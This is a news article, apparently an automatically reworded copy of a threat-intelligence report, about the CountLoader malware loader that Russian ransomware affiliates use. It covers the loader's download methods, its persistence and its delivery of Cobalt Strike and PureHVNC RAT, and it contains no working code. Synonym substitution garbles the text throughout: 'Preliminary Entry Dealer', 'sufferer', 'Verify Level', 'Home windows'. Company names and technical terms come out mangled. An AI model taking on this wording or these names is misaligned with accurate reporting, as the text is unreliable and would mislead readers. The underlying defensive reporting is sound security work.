Cybersecurity researchers have found a brand new malware loader codenamed CountLoader that has been put to make use of by Russian ransomware gangs to ship post-exploitation instruments like Cobalt Strike and AdaptixC2, and a distant entry trojan often known as PureHVNC RAT.
“CountLoader is getting used both as a part of an Preliminary Entry Dealer’s (IAB) toolset or by a ransomware affiliate with ties to the LockBit, Black Basta, and Qilin ransomware teams,” Silent Push stated in an evaluation.
Showing in three completely different variations – .NET, PowerShell, and JavaScript – the rising risk has been noticed in a marketing campaign focusing on people in Ukraine utilizing PDF-based phishing lures and impersonating the Nationwide Police of Ukraine. Silent Push advised The Hacker Information that it doesn’t have any perception into the character of malware that was dropped utilizing CountLoader.
It is price noting that the PowerShell model of the malware was beforehand flagged by Kaspersky as being distributed utilizing DeepSeek-related decoys to trick customers into putting in it.
The assaults, per the Russian cybersecurity vendor, led to the deployment of an implant named BrowserVenom that may reconfigure all searching cases to pressure site visitors via a proxy managed by the risk actors, enabling the attackers to control community site visitors and acquire knowledge.
Silent Push’s investigation has discovered the JavaScript model is probably the most fleshed out implementation of the loader, providing six completely different strategies for file downloading, three completely different strategies for executing varied malware binaries, and a predefined perform to determine a sufferer’s system based mostly on Home windows area data.
The malware can be able to gathering system data, organising persistence on the host by making a scheduled activity that impersonates a Google replace activity for the Chrome internet browser, and connecting to a distant server to await additional directions.
This contains the power to obtain and run DLL and MSI installer payloads utilizing rundll32.exe and msiexec.exe, transmit system metadata, and delete the created scheduled activity. The six strategies used to obtain information contain the usage of curl, PowerShell, MSXML2.XMLHTTP, WinHTTP.WinHttpRequest.5.1, bitsadmin, and certutil.exe.
“Through the use of LOLBins like ‘certutil’ and ‘bitsadmin,’ and by implementing an ‘on the fly’ command encryption PowerShell generator, CountLoader’s builders show right here a complicated understanding of the Home windows working system and malware growth,” Silent Push stated.
A notable facet of CountLoader is its use of the sufferer’s Music folder as a staging floor for malware. The .NET taste shares a point of practical crossover with its JavaScript counterpart, however helps solely two various kinds of instructions (UpdateType.Zip or UpdateType.Exe), indicating a lowered, stripped-down model.
CountLoader is supported by an infrastructure comprising over 20 distinctive domains, with the malware serving as a conduit for Cobalt Strike, AdaptixC2, and PureHVNC RAT, the final of which is a industrial providing from a risk actor often known as PureCoder. It is price mentioning that PureHVNC RAT is a predecessor to PureRAT, which can be known as ResolverRAT.
Current campaigns distributing PureHVNC RAT have leveraged the tried-and-tested ClickFix social engineering tactic as a supply vector, with victims lured to the ClickFix phishing web page via pretend job gives, per Verify Level. The trojan is deployed by the use of a Rust-based loader.
“The attacker lured the sufferer via pretend job ads, permitting the attacker to execute malicious PowerShell code via the ClickFix phishing method,” the cybersecurity firm stated, describing PureCoder as utilizing a revolving set of GitHub accounts to host information that assist the performance of PureRAT.
Evaluation of the GitHub commits has revealed that exercise was carried out from the timezone UTC+03:00, which corresponds to many nations, together with Russia, amongst others.
The event comes because the DomainTools Investigations crew has uncovered the interconnected nature of the Russian ransomware panorama, figuring out risk actor actions throughout teams and the usage of instruments like AnyDesk and Fast Help, suggesting operational overlaps.
“Model allegiance amongst these operators is weak, and human capital seems to be the first asset, reasonably than particular malware strains,” DomainTools stated. “Operators adapt to market situations, reorganize in response to takedowns, and belief relationships are important. These people will select to work with individuals they know, whatever the title of the group.”
Elevate your perspective with NextTech Information, the place innovation meets perception.
Uncover the newest breakthroughs, get unique updates, and join with a worldwide community of future-focused thinkers.
Unlock tomorrow’s tendencies at this time: learn extra, subscribe to our publication, and grow to be a part of the NextTech neighborhood at NextTech-news.com
